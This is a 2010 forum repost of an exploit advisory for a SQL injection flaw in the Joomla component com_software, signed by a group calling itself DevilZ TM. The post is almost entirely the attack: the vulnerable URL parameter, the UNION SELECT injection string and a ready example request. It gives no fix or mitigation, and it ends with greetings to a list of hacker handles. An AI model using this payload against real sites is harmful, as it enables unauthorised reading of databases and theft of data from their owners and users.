Marian Posted March 25, 2010 Report Posted March 25, 2010 # Title : Joomla Component com_software SQL Injection Vulnerability# Author: DevilZ TM# Data : 2010-03-24[~]######################################### InformatioN #############################################[~][~] Title : Joomla Component com_software SQL Injection Vulnerability[~] Author : DevilZ TM By D3v1l[~] Homepage : http://www.DEVILZTM.com[~] Email : Expl0it@DevilZTM.Com[~] Contact : D3v1l.blackhat@yahoo.com[~]######################################### ExploiT #############################################[~][~] Vulnerable File :http://127.0.0.1/index.php?option=com_software&task=viewDetail&software_id=[SQL][~] ExploiT :-1+UNION+SELECT+1--[~] Example :http://127.0.0.1/index.php?option=com_software&task=viewDetail&software_id=-1+UNION+SELECT+1--[~]######################################### ThankS To ... ############################################[~][~] Special Thanks To My Best FriendS :Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS[~] IRANIAN Young HackerZ[~]######################################### FinisH #############################################[~] Quote